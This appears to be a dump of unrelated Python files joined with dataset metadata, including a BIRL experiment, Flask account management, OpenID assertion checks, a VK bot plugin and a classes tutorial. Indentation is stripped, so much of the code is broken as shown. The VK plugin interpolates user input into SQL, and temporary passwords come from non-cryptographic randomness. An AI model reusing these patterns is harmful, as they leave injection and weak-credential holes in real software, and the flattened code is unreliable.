# from birl import *
from functools import partial
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.gridspec as gridspec
from modified_birl import *
def main():
number_of_iterations = 10
# expert_mdp = GridMDP([[-10, -5, 0, 0, 10],
# [-5, -3, 0, 0, 0],
# [0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0]],
# terminals=[(4,3)])
# expert_mdp = GridMDP([[-10, -5, -3, -1, 0, 0, 0, 0, 0, 10],
# [-8, -5, -3, 0, 0, 0, 0, 0, 0, 0],
# [-5, -2, -1, 0, 0, 0, 0, 0, 0, 0],
# [-3, -1, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]],
# terminals=[(9,4)])
#
# expert_mdp = GridMDP([[0, 0, 0, 0, -1, -1, 0, 0, 0, 10],
# [0, 0, 0, -3, -3, -3, -3, 0, 0, 0],
# [0, 0, 0, -3, -5, -5, -3, 0, 0, 0],
# [0, 0, 0, -3, -3, -3, -3, 0, 0, 0],
# [0, 0, 0, 0, 0, -1, -1, 0, 0, 0]],
# terminals=[(9,4)])
#
# rewards = [[0, 0, 0, 0, -1, -1, 0, 0, 0, 10],
# [0, 0, 0, -3, -3, -3, -3, 0, 0, 0],
# [0, 0, 0, -3, -5, -5, -3, 0, 0, 0],
# [0, 0, 0, -3, -3, -3, -3, 0, 0, 0],
# [0, 0, 0, 0, 0, -1, -1, 0, 0, 0]]
#
rewards = [[0, 0, 0, 0, -8, -8, 0, 0, 0, 10],
[0, 0, 0, -8, -10, -10, -8, 0, 0, 0],
[0, 0, 0, -8, -10, -10, -8, 0, 0, 0],
[0, 0, 0, -8, -10, -10, -8, 0, 0, 0],
[0, 0, 0, 0, 0, -8, -8, 0, 0, 0]]
# rewards = [[-6, -3, -1, 0, 0, 0, 0, 0, 0, 10],
# [-3, -3, -1, 0, 0, 0, 0, 0, 0, 0],
# [-1, -1, -1, 0, 0, 0, 0, -1, -1, -1],
# [0, 0, 0, 0, 0, 0, 0, -1, -3, -3],
# [0, 0, 0, 0, 0, 0, 0, -1, -3, -6]]
#
# rewards = [[0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0, 10],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, 0, 0, 0, 0, 0, 0]]
expert_mdp = GridMDP(rewards,
terminals=[(9, 4)])
expert_trace = best_policy(expert_mdp, value_iteration(expert_mdp, 0.001))
print "Expert rewards:"
expert_mdp.print_rewards()
print "Expert policy:"
print_table(expert_mdp.to_arrows(expert_trace))
print "---------------"
expert_trace.pop((0,1))
expert_trace.pop((0,2))
expert_trace.pop((0,3))
birl = ModifiedBIRL(expert_trace, expert_mdp.get_grid_size(), expert_mdp.terminals,
partial(calculate_error_sum, expert_mdp), birl_iteration=2, step_size=1.0)
run_multiple_birl(birl, expert_mdp, expert_trace, number_of_iterations)
def plot_errors(policy_error, reward_error, directory_name, birl, i, expert_mdp, mdp):
gs = gridspec.GridSpec(3, 2)
ax0 = plt.subplot(gs[0, :-1])
ax1 = plt.subplot(gs[0, -1])
ax2 = plt.subplot(gs[1, :])
ax3 = plt.subplot(gs[2, :])
expert_data = np.array(expert_mdp.get_grid())
ax0.pcolor(expert_data, cmap=plt.cm.RdYlGn)
ax0.set_title("Expert's Rewards")
ax0.invert_yaxis()
data = np.array(mdp.get_grid())
ax1.pcolor(data, cmap=plt.cm.RdYlGn)
ax1.set_title("Reward Estimations")
ax1.invert_yaxis()
ax2.plot(range(birl.birl_iteration), policy_error, 'ro')
ax2.set_title('Policy change')
ax3.plot(range(birl.birl_iteration), reward_error, 'bo')
ax3.set_title('Reward change')
plt.tight_layout()
plt.savefig(directory_name + "/run" + str(i) + ".png")
def run_multiple_birl(birl, expert_mdp, expert_trace, number_of_iteration):
"""Run BIRL algorithm number_of_iteration times.
"""
directory_name = initialize_output_directory(birl)
for i in range(number_of_iteration):
pi, mdp, policy_error, reward_error = birl.run_birl()
plot_errors(policy_error, reward_error, directory_name, birl, i, expert_mdp, mdp)
print("Run :" + str(i))
print_reward_comparison(mdp, pi, expert_mdp, expert_trace)
print_error_sum(mdp, birl, expert_mdp)
def initialize_output_directory(birl):
directory_name = 'outputs/iter' + str(birl.birl_iteration) + \
'_stepsize' + str(birl.step_size) + '_no' + str(randint(0, 2 ** 30))
if not os.path.exists(directory_name):
os.makedirs(directory_name)
return directory_name
def print_reward_comparison(mdp, pi, expert_mdp, expert_trace):
print_table(mdp.to_arrows(pi))
print "vs"
print_table(mdp.to_arrows(expert_trace))
print("Policy difference is " + str(get_policy_difference(pi, expert_trace)))
mdp.print_rewards()
print "vs"
expert_mdp.print_rewards()
def print_error_sum(mdp, birl, expert_mdp):
print ("Total Error: " + str(normalize_by_max_reward(calculate_error_sum(mdp, expert_mdp), birl)))
print "---------------"
def print_sse(mdp, expert_trace):
print ("Reward SSE: " + str(calculate_sse(mdp, expert_trace)))
print "---------------"
def normalize_by_max_reward(value, birl):
if birl.r_max != abs(birl.r_min):
raise Exception("Normalization cannot be done. r_min and r_max values have different abs sums!")
return value / float(birl.r_max)
def calculate_sse(mdp1, mdp2):
"Returns the sum of the squared errors between two reward functions"
sse = 0
if not (mdp1.cols == mdp2.cols and mdp1.rows == mdp2.rows):
raise Exception("Mismatch between # of rows and columns of reward vectors")
for x in range(mdp1.cols):
for y in range(mdp1.rows):
sse += (mdp1.reward[x, y] - mdp2.reward[x, y]) ** 2
return sse
def calculate_error_sum(mdp1, mdp2):
"""Returns the sum of errors between two reward functions
Sum is normalized with respect to the number of states
"""
sum = 0
if not (mdp1.cols == mdp2.cols and mdp1.rows == mdp2.rows):
raise Exception("Mismatch between # of rows and columns of reward vectors")
for x in range(mdp1.cols):
for y in range(mdp1.rows):
sum += abs(mdp1.reward[x, y] - mdp2.reward[x, y])
return sum / (float(mdp1.cols * mdp1.rows))
def get_policy_difference(new_pi, ex_pi):
shared_items = set(new_pi.items()) & set(ex_pi.items())
return len(new_pi.items()) - len(shared_items)
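# A small usage sketch (hypothetical policies): two policies that agree on one
# state and differ on the other yield a difference of 1.
#
#   >>> get_policy_difference({(0, 0): '>', (0, 1): '^'},
#   ...                       {(0, 0): '>', (0, 1): 'v'})
#   1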
if __name__ == "__main__":
main() | 2.515625 | 3 |
fixipy/__init__.py | Jaydabi/pyfix | 0 | 12786474 | <gh_stars>0
from .Message import Message
| 1.085938 | 1 |
accounts.py | qwerith/Weather-Project | 0 | 12786475 | <gh_stars>0
import psycopg2
import os
import re
import string
import random
import logging
from dotenv import load_dotenv, find_dotenv
from flask_bcrypt import Bcrypt
from flask import redirect, session
bcrypt = Bcrypt()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("""%(asctime)s:%(name)s:
%(filename)s:%(funcName)s:
%(levelname)s:%(message)s""")
handler = logging.FileHandler("logs.log")
handler.setFormatter(formatter)
handler.setLevel(logging.INFO)
logger.addHandler(handler)
#loading environment variables
try:
load_dotenv(find_dotenv())
con = psycopg2.connect(host = os.getenv("HOST"), database = os.getenv("DATABASE"),
                        user = os.getenv("USER"), password = os.getenv("db_PASSWORD"),
port=5432)
cur = con.cursor()
except Exception:
logger.exception("Database credentials error")
raise
class Accounts():
"""Manages user accounts, queries data for session module, password changes and recovery"""
def __init__(self, email, password):
self.email = email.strip(" ")
self.password = password.strip(" ")
def register(self, username):
try:
con = psycopg2.connect(host = os.getenv("HOST"), database = os.getenv("DATABASE"),
user = os.getenv("USER"), password = os.getenv("db_PASSWORD"),
port=5432)
cur = con.cursor()
        except Exception:
            logger.exception("Database credentials error")
raise RuntimeError("Database credentials error")
cur.execute("SELECT EXISTS(SELECT 1 FROM users WHERE email = %s LIMIT 1)", (self.email, ))
con.commit()
result = cur.fetchall()
if result[0][0] != False:
return ["Account already exists"]
else:
try:
cur.execute("""INSERT INTO users (username, email, password)
VALUES ( %s, %s, %s )""",(username.strip(" "), self.email,
bcrypt.generate_password_hash(self.password).decode("utf-8")))
con.commit()
con.close()
return ["Your account has been successfully created"]
except:
con.close()
return ["Registration failed"]
def user_verification(self):
cur.execute("SELECT id, username, email, password FROM users WHERE email=%s LIMIT 1",
(self.email, ))
con.commit()
user = cur.fetchall()
if user and bcrypt.check_password_hash(user[0][3], self.password):
return(True, user)
else:
return None
def delete(self):
cur.execute("DELETE FROM users WHERE email=%s", (self.email, ))
con.commit()
def change_password(self, new_password):
cur.execute("UPDATE users SET password=%s WHERE email=%s",
(bcrypt.generate_password_hash(new_password).decode("utf-8"), self.email))
con.commit()
def restore_password(self, temp_password_hash, temp_password):
if bcrypt.check_password_hash(temp_password_hash, temp_password):
cur.execute("UPDATE users SET password=%s WHERE email=%s",
(bcrypt.generate_password_hash(self.password).decode("utf-8"), self.email))
con.commit()
return True
return None
# Generates random password for recovery process
def generate_temporary_password(email):
cur.execute("SELECT EXISTS(SELECT 1 FROM users WHERE email = %s LIMIT 1)", (email, ))
con.commit()
result = cur.fetchall()
if result[0][0] != False:
chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
size = random.randint(5, 10)
temp_password = ''.join(random.choice(chars) for x in range(size))
password_hash = bcrypt.generate_password_hash(temp_password).decode("utf-8")
return password_hash, temp_password
return None, ""
def input_validation(user_input):
#regex form for email validation
try:
len(user_input) > 1
for i in user_input:
if type(i) != str:
return ["Invalid data type"]
except IndexError:
logger.error(IndexError)
raise
response = []
email_pattern = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
punctuation = """[!#$%&'()*+, -./:;"<=>?@[\]^_`{|}~:]"""
if not (re.match(email_pattern, user_input[0])):
response.append("Invalid email")
if (not len(user_input[1]) >= 5 and len(user_input[1]) <= 10 or
re.findall(punctuation, user_input[1]) != []):
response.append("Password must be 5 to 10 characters long")
if len(user_input) == 3:
if not user_input[1] == user_input[2] or re.findall(punctuation, user_input[2]) != []:
response.append("Passwords do not match")
if len(user_input) == 4:
if not user_input[2] == user_input[3] or re.findall(punctuation, user_input[3]) != []:
response.append("Passwords do not match")
return response
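# A small usage sketch (hypothetical inputs): a malformed address plus a too-short
# password collects both messages, while a valid email with matching passwords
# returns an empty list.
#
#   >>> input_validation(["not-an-email", "abc"])
#   ['Invalid email', 'Password must be 5 to 10 characters long']
#   >>> input_validation(["user@example.com", "Secret9", "Secret9"])
#   []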
def login_required(func):
def wrapper(*args, **kwargs):
        if session.get("user_id") is not None:
            return func(*args, **kwargs)
return redirect("/login")
return wrapper
| 2.34375 | 2 |
resetpwd/models.py | catbei2020/ad-password-self-service | 1 | 12786476 | <filename>resetpwd/models.py
from django.db import models
from django import forms
from django.contrib import auth
| 1.304688 | 1 |
vk_bot/mods/yourphoto/getcommand.py | triangle1984/GLaDOS | 3 | 12786477 | <gh_stars>1-10
from vk_bot.core.modules.basicplug import BasicPlug
from vk_bot.core.modules.othermethods import OtherMethod
from vk_bot.core.sql.vksql import *
class Getcommand(BasicPlug, OtherMethod):
doc = "вытащить команду"
types = 'commandb'
@staticmethod
def getcommand(uid, command):
if bool(command) == False:
return
check = checktable("yourphoto", "id", uid, andd=f"command = '{command}'")
if check:
return check["command"]
else:
return 666
def main(self):
check = checktable("yourphoto", "id", self.uid, andd=f"command = '{self.text[0]}'")
if check:
public = check["public"]
public = public.split(",")
photos = self.phootowallrandom(public)
self.sendmsg("Пикча из личного альбома~", photos)
| 2.296875 | 2 |
src/graphql/document/field_query.py | btrekkie/graphql | 0 | 12786478 | class GraphQlFieldQuery(object):
"""A request for the value of a GraphQL object's field.
dict<basestring, object> args - The arguments to the field. The
entries are the Python object representations of the arguments'
values, with GraphQlVariableReference objects for variable
references. The entries are not None and do not contain the
value None.
list<GraphQlDirective> directives - The directives for the field
query.
FieldDescriptor field_descriptor - The description of the field we
are querying.
basestring response_key - The key that maps to the field's value in
the GraphQL response.
GraphQlSelectionSet selection_set - The selection set indicating the
information to request from the field.
"""
def __init__(
self, response_key, field_descriptor, arguments, selection_set,
directives):
self.response_key = response_key
self.field_descriptor = field_descriptor
self.args = arguments
self.selection_set = selection_set
self.directives = directives
| 2.546875 | 3 |
01-Lesson-Plans/03-Python/3/Activities/08-Par_GraduatingFunctions/Unsolved/graduation_functions.py | anirudhmungre/sneaky-lessons | 0 | 12786479 | <reponame>anirudhmungre/sneaky-lessons
import os
import csv
# Path to collect data from the Resources folder
# Define the function and have it accept the 'state_data' as its sole parameter
# Find the total students
# Find the total graduates
# Find the public school graduation rate
# Remember that some states do not have nonprofit or forprofit private schools
# Find the non-profit school graduation rate
# Find the for-profit school graduation rate
# Calculate the overall graduation rate
# Print out the state's name and its graduation rates
# Read in the CSV file
with open(graduation_csv, 'r') as csvfile:
# Split the data on commas
csvreader = csv.reader(csvfile, delimiter=',')
header = next(csvreader)
# Prompt the user for what state they would like to search for
state_to_check = input("What state do you want to look for? ")
# Loop through the data
for row in csvreader:
# If the state's name in a row is equal to that which the user input, run the 'print_percentages()' function
if state_to_check == row[0]:
print_percentages(row)
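# A possible solution sketch for the steps listed above, left as comments so the
# exercise stays unsolved. The CSV filename and the column layout are hypothetical
# -- adjust them to the actual file in the Resources folder:
#
#   graduation_csv = os.path.join("Resources", "graduation_data.csv")
#
#   def print_percentages(state_data):
#       # Hypothetical columns: [1]/[2] public grads/students,
#       # [3]/[4] nonprofit grads/students, [5]/[6] forprofit grads/students
#       total_students = sum(int(state_data[i]) for i in (2, 4, 6))
#       total_grads = sum(int(state_data[i]) for i in (1, 3, 5))
#       public_rate = int(state_data[1]) / int(state_data[2]) * 100
#       # Some states have no nonprofit or forprofit schools, so guard the division
#       nonprofit_rate = (int(state_data[3]) / int(state_data[4]) * 100
#                         if int(state_data[4]) else 0)
#       forprofit_rate = (int(state_data[5]) / int(state_data[6]) * 100
#                         if int(state_data[6]) else 0)
#       overall_rate = total_grads / total_students * 100
#       print(f"{state_data[0]} -- Public: {public_rate:.1f}% | "
#             f"Nonprofit: {nonprofit_rate:.1f}% | "
#             f"Forprofit: {forprofit_rate:.1f}% | Overall: {overall_rate:.1f}%")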
| 4.15625 | 4 |
examples/Multiple-time-series.py | KikeM/time-series-generator | 6 | 12786480 | # ---
# jupyter:
# jupytext:
# formats: ipynb,md,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.4.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown]
# Add to the path the generator folder.
# %%
import sys
from pathlib import Path
path = Path("../generator")
sys.path.insert(0, path.as_posix())
pwd = path.parent
# %%
import numpy as np
import pandas as pd
from generator import TimeSeriesGenerator
# %%
NUMBER_SERIES = 10
NUMBER_DAYS = 260
# %%
configuration = {
"meta": {
"number_of_observations": NUMBER_DAYS,
"path": "./timeseries/",
"time_series_name": "01-base",
},
"base_line": {"base": 10, "variance": 2},
"timestamps": {"start": 0, "step": 1},
"trend": {"slope": 0.1},
"season": {"height": 5, "period": 21},
"breaks": [{"from": 10, "to": 100, "value": 10}],
}
# %%
# Generate time series
generator = TimeSeriesGenerator(configuration["meta"])
series = []
for number in range(1, NUMBER_SERIES + 1):
# Add randomness to differentiate the time series
configuration["base_line"]["base"] = np.random.randint(low=10, high=50)
configuration["trend"]["slope"] = 0.35 * np.random.rand()
configuration["season"]["height"] = np.abs(5 * np.random.rand())
configuration["season"]["period"] = np.random.randint(low=21, high=120)
configuration["breaks"][0]["from"] = np.random.randint(low=21, high=120)
configuration["breaks"][0]["to"] = np.random.randint(
low=configuration["breaks"][0]["from"], high=NUMBER_DAYS
)
configuration["breaks"][0]["value"] = np.random.randint(low=5, high=10)
generator.generate(configuration)
ts = generator.get_business_like()
ts.name = number
series.append(ts)
# Collect all time series
prices_df = pd.DataFrame(series).T
prices_df.index.name = "date"
# %%
prices_df.plot()
| 2.515625 | 3 |
besspin/cyberPhys/cyberphyslib/tests/test_canout.py | mikkowus/BESSPIN-Tool-Suite | 0 | 12786481 | """
Project: SSITH CyberPhysical Demonstrator
Name: test_canout.py
Author: <NAME>
Date: 08 April 2021
Tests for the cyberphys can location poller
"""
import cyberphyslib.demonstrator.can_out as ccout
import cyberphyslib.demonstrator.component as ccomp
from cyberphyslib.demonstrator.handler import ComponentHandler
import time
def test_canout():
"""test the canout service
operational tests:
1. start / stop
failure mode tests:
<None>
"""
# simple start / stop
# TODO: conduct more tests
handler = ComponentHandler()
msg = handler.start_component(ccout.CanOutPoller(None))
assert msg == ccomp.ComponentStatus.READY
handler.exit()
| 2.140625 | 2 |
openid_wargaming/verification.py | mac-developer/WargamingOpenID | 4 | 12786482 | <filename>openid_wargaming/verification.py
"""OpenID 2.0 - Verifiying Assertions
Ref: https://openid.net/specs/openid-authentication-2_0.html#verification
"""
from urllib.parse import urlparse, parse_qs, urlencode
from requests import post
from .exceptions import BadOpenIDReturnTo, OpenIDFailReturnURLVerification
from .exceptions import OpenIDVerificationFailed
from .utils import nonce_saver, nonce_reader
class Verification:
"""OpenID data verification.
Receive a return OpenID URL
Note:
Based on OpenID specification
https://openid.net/specs/openid-authentication-2_0.html
Args:
assertion_url
evidence
Attributes:
assertion
Args:
assertion_url
saver: function reference which accepts one argument (data/payload)
and returns True if was saved.
reader: function reference which accepts one argument
(openid.response_nonce) and check if exists on reader
backend. Returns True if exists.
"""
def __init__(self, assertion_url, evidence=None, saver=None, reader=None):
self.assertion = urlparse(assertion_url)
self.saver = saver or nonce_saver
self.reader = reader or nonce_reader
@property
def return_to(self):
key = 'openid.return_to'
query = parse_qs(self.assertion.query)
if key in query:
return urlparse(query[key][0])
else:
return None
def is_positive_assertion(self):
"""Positive Assertions
Reference: https://openid.net/specs/openid-authentication-2_0.html
Section: 10.1
Verify 'id_res' as positive assertion.
Returns:
reason - When negative assertion
"""
key = 'openid.mode'
query = parse_qs(self.assertion.query)
if key in query:
mode = query[key][0]
else:
raise BadOpenIDReturnTo("return_to url doesn't look to OpenID url",
query)
if mode == 'id_res':
return True
else:
self.reason = mode
return False
def verify_return_url(self):
"""OpenID Verifying the Return URL
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.1
To verify that the "openid.return_to" URL matches the URL that is
processing this assertion:
* The URL scheme, authority, and path MUST be the same between
the two URLs.
* Any query parameters that are present in the "openid.return_to"
URL MUST also be present with the same values in the URL of the
HTTP request the RP received.
"""
if self.assertion.scheme != self.return_to.scheme or \
self.assertion.netloc != self.return_to.netloc or \
self.assertion.path != self.return_to.path:
reason = 'scheme/authority/path are not the same'
raise OpenIDFailReturnURLVerification(reason)
query_parameters = parse_qs(self.return_to.query)
assertion_parameters = parse_qs(self.assertion.query)
for parameter, value in query_parameters.items():
if parameter in assertion_parameters:
if value[0] != assertion_parameters[parameter][0]:
                    reason = 'parameter %s does not have the same value' % parameter
raise OpenIDFailReturnURLVerification(reason)
else:
reason = 'parameter %s is not present' % parameter
raise OpenIDFailReturnURLVerification(reason)
return True
def verify_discovered_information(self):
"""OpenID Verifying Discovered Information **NOT IMPLEMENTED**
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.2
"""
return True
def check_nonce(self):
"""OpenID Checking the None.
To prevent replay attacks, the agent checking the signature keeps
track of the nonce values included in positive assertions and never
accepts the same value more than once for the same OP Endpoint URL.
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.3
"""
nonce = parse_qs(self.assertion.query)['openid.response_nonce'][0]
if not self.reader(nonce):
self.saver(nonce)
return True
else:
return False
def verify_signatures(self):
"""OpenID Verifying Signatures (Wargaming uses Direct Verification).
To have the signature verification performed by the OP,
the Relying Party sends a direct request to the OP.
To verify the signature, the OP uses a private association that
was generated when it issued the positive assertion.
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.4.2
"""
# Note: This header is very important to allow this application works
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
query = parse_qs(self.assertion.query)
# Change openid.mode to check the signature
query['openid.mode'][0] = 'check_authentication'
# Flatten query object. Remove list and get the [0] element
query = {key: value[0] for key, value in query.items()}
to_sign = urlencode(query)
# Verification Request
        request = post(self.op_endpoint, to_sign, allow_redirects=False,
headers=headers)
# Verification parsing
verification = self.parse_l2l(request.text)
return verification.get('is_valid', False)
def identify_the_end_user(self):
"""OpenID Identifying the end user.
The Claimed Identifier in a successful authentication
response SHOULD be used by the Relying Party as a key for local
storage of information about the user. The Claimed Identifier MAY
be used as a user-visible Identifier.
When displaying URL Identifiers, the fragment MAY be omitted.
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.5
Field: openid.identity and openid.claimed_id
"""
query = parse_qs(self.assertion.query)
return {
'identity': query['openid.identity'][0],
'claimed_id': query['openid.claimed_id'][0],
}
def parse_l2l(self, response):
"""Parse line by line OpenID response.
Example:
is_valid:false
ns:http://specs.openid.net/auth/2.0
"""
cleaned = response.strip().split('\n')
return {fields.split(':')[0].strip():
self.convert_type(''.join(fields.split(':')[1:]).strip())
for fields in cleaned}
def convert_type(self, value):
TYPES = {
'false': False,
'true': True
}
return TYPES.get(value, value)
def verify(self):
"""Process to verify an OpenID assertion.
This is the last step, you'll get a positive identification
or a failure.
Returns:
Identification
"""
validators = [self.is_positive_assertion,
self.verify_return_url,
self.verify_discovered_information,
self.check_nonce,
self.verify_signatures]
for validator in validators:
is_valid = validator()
if not is_valid:
name = validator.__name__
reason = 'Validation fail on %s' % name
raise OpenIDVerificationFailed(reason, name)
return self.identify_the_end_user()
@property
    def op_endpoint(self):
query = parse_qs(self.assertion.query)
return query['openid.op_endpoint'][0]
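
# --- illustrative usage sketch (not part of the library) ----------------------
# Typical wiring after the OP redirects back to the Relying Party. The callback
# URL below is a placeholder; a real OpenID assertion URL (with the complete
# openid.* query string) is needed for verify() to succeed. The in-memory nonce
# store (save_nonce / nonce_exists) is a hypothetical stand-in for a real backend.
if __name__ == '__main__':  # pragma: no cover
    seen_nonces = set()

    def save_nonce(nonce):
        seen_nonces.add(nonce)
        return True

    def nonce_exists(nonce):
        return nonce in seen_nonces

    assertion_url = 'https://rp.example.com/callback?openid.mode=id_res'  # placeholder
    verification = Verification(assertion_url, saver=save_nonce, reader=nonce_exists)
    # With a complete assertion URL this returns
    # {'identity': ..., 'claimed_id': ...} or raises OpenIDVerificationFailed.
    # user = verification.verify()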
| 3.015625 | 3 |
src/aeml/models/tcn/forecast.py | kjappelbaum/aeml | 0 | 12786483 | # -*- coding: utf-8 -*-
from functools import partial
import numpy as np
import pandas as pd
def summarize_results(results):
values = []
for df in results:
values.append(df.pd_dataframe().values)
df = df.pd_dataframe()
columns = df.columns
return (
pd.DataFrame(np.mean(values, axis=0), columns=columns, index=df.index),
pd.DataFrame(np.std(values, axis=0), columns=columns, index=df.index),
)
def _run_backtest(
rep, model, x_test, y_test, start=0.3, stride=1, horizon=4, enable_mc_dropout=True
):
backtest = model.historical_forecasts(
y_test,
past_covariates=x_test,
start=start,
forecast_horizon=horizon,
stride=stride,
retrain=False,
verbose=False,
enable_mc_dropout=enable_mc_dropout,
)
return backtest
def parallelized_inference(
model, x, y, repeats=100, start=0.3, stride=1, horizon=6, enable_mc_dropout=True
):
results = []
backtest_partial = partial(
_run_backtest,
model=model,
x_test=x,
y_test=y,
start=start,
stride=stride,
horizon=horizon,
enable_mc_dropout=enable_mc_dropout,
)
for res in map(backtest_partial, range(repeats)):
results.append(res)
return results
def _run_forecast(_, model, x_full, y_past, future_len, enable_mc_dropout=True):
return model.predict(
future_len, series=y_past, past_covariates=x_full, enable_mc_dropout=enable_mc_dropout
)
def forecast(model, x_full, y_past, future_len, repeats=100, enable_mc_dropout=True):
results = []
backtest_partial = partial(
        _run_forecast,
model=model,
x_full=x_full,
y_past=y_past,
future_len=future_len,
enable_mc_dropout=enable_mc_dropout,
)
for res in map(backtest_partial, range(repeats)):
results.append(res)
return results
| 2.5625 | 3 |
app.py | TwilioDevEd/sync-quickstart-python | 2 | 12786484 | <reponame>TwilioDevEd/sync-quickstart-python<gh_stars>1-10
import os
from flask import Flask, jsonify, request, send_from_directory
from faker import Factory
from twilio.jwt.access_token import AccessToken
from twilio.jwt.access_token.grants import SyncGrant
app = Flask(__name__)
fake = Factory.create()
@app.route('/')
def index():
return app.send_static_file('index.html')
@app.route('/<path:path>')
def send_js(path):
return send_from_directory('static', path)
@app.route('/token')
def token():
    # get credentials from environment variables
account_sid = os.environ['TWILIO_ACCOUNT_SID']
api_key = os.environ['TWILIO_API_KEY']
api_secret = os.environ['TWILIO_API_SECRET']
service_sid = os.environ['TWILIO_SYNC_SERVICE_SID']
# create a randomly generated username for the client
identity = fake.user_name()
# Create access token with credentials
token = AccessToken(account_sid, api_key, api_secret, identity)
# Create a Sync grant and add to token
sync_grant = SyncGrant(service_sid=service_sid)
token.add_grant(sync_grant)
# Return token info as JSON
return jsonify(identity=identity, token=token.to_jwt())
if __name__ == '__main__':
app.run(port=4567, debug=True, threaded=True)
| 2.4375 | 2 |
{{ cookiecutter.package_name }}/tests/test_config.py | triaxtec/fastapi-serverless-cookiecutter | 15 | 12786485 | def test_get_config_aws_load(mocker):
from {{ cookiecutter.module_name }} import config
AWSSource = mocker.patch.object(config, "AWSSource", return_value={"custom_key": "custom_value"})
mocker.patch.object(config, "_app_config", None)
config = config.get_config({"env": "testing"})
AWSSource.assert_called_once_with("{{ cookiecutter.module_name }}/testing")
assert config["custom_key"] == "custom_value"
| 2.25 | 2 |
Classes and Inheritance.py | PiusLucky/python-classes | 1 | 12786486 | <reponame>PiusLucky/python-classes
# Example of a simple class
class Car:
tire_numbers = 4
sterling_color = "Black"
speed = "100–120 km/h"
# simple class with one method
class Car:
tire_numbers = 4
sterling_color = "Black"
speed = "100–120 km/h"
def check_speed(self):
return self.speed
# simple class with two methods
class Car:
tire_numbers = 4
sterling_color = "Black"
speed = "100–120 km/h"
def check_speed(self):
return self.speed # we access the class attribute with the "self" keyword
def check_tires_count(self):
return self.tire_numbers # we access the class attribute with the "self" keyword
# 'my_car' is an object
my_car = Car() # class instantiation
# We could access Class Car variables like so:
print(my_car.tire_numbers)
# Quick Tip
# To call a function, use the function name followed by parentheses
# check_speed is a method of the class Car.
print(my_car.check_speed())
# Results from console
# 4
# 100–120 km/h
# [Finished in 0.5s]
# print(dir(Car))
# Results from console
# ['__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', 'check_speed', 'check_tires_count', 'speed', 'sterling_color', 'tire_numbers']
# non-argument class - a class that requires no argument
class Car:
def __init__(self, tire_numbers=4, sterling_color="Black", speed="100–120 km/h"): # __init__ method
self.tire_numbers = tire_numbers
self.sterling_color = sterling_color
self.speed = speed
def check_speed(self):
return self.speed # we access the class attribute with the "self" keyword
def check_tires_count(self):
return self.tire_numbers # we access the class attribute with the "self" keyword
my_car = Car() # class instantiation
print("Car class with", my_car.tire_numbers, "tires") # Car class with 4 tires
print("Car class with", my_car.sterling_color, "sterling") # Car class with Black sterling
print("Car class with", my_car.speed, "of speed") # Car class with 100–120 km/h of speed
# argumennt class - a class that requires arguments
class Car:
def __init__(self, tire_numbers, sterling_color, speed): # __init__ method with self & 3 parameters
self.tire_numbers = tire_numbers
self.sterling_color = sterling_color
self.speed = speed
def check_speed(self):
return self.speed # we access the class attribute with the "self" keyword
def check_tires_count(self):
return self.tire_numbers # we access the class attribute with the "self" keyword
my_car = Car(4, "Black", "100–120 km/h") # class instantiation with arguments
print("Car class with", my_car.tire_numbers, "tires") # Car class with 4 tires
print("Car class with", my_car.sterling_color, "sterling") # Car class with Black sterling
print("Car class with", my_car.speed, "of speed") # Car class with 100–120 km/h of speed
# function
def add_number(first_number, second_number):
addition = first_number + second_number # addition logic
print(addition)
return addition
add_number(2, 4) # 6
# equivalent class
class AddNumber:
def __init__(self, first_number, last_number): # __init__ method with self & 2 parameters
self.first_number = first_number
self.last_number = last_number
def add_number(self):
addition = self.first_number + self.last_number # addition logic
return addition
# instantiating the AddNumber class
add_number_object = AddNumber(2, 4) # object
# call the add_number method
print(add_number_object.add_number()) # 6
# class inheritance
# BaseClass
class Father:
def __init__(self, fathers_firstname): # Base __init__ method with self & 1 parameter
self.fathers_firstname = fathers_firstname
def get_first_name(self):
return "Father " + self.fathers_firstname
# Derived Class
class Child_1(Father):
# Derived __init__ method with self & 1 base parameter & 1 derived class parameter
def __init__(self, fathers_firstname, childs_firstname):
# Pass in all the attributes of the base class into the super() init function [they are all required]
super().__init__(fathers_firstname)
# You don't need to initialize the base class attributes, just the new attribute needs initializing
self.childs_firstname = childs_firstname # initializing the new attribute
# method
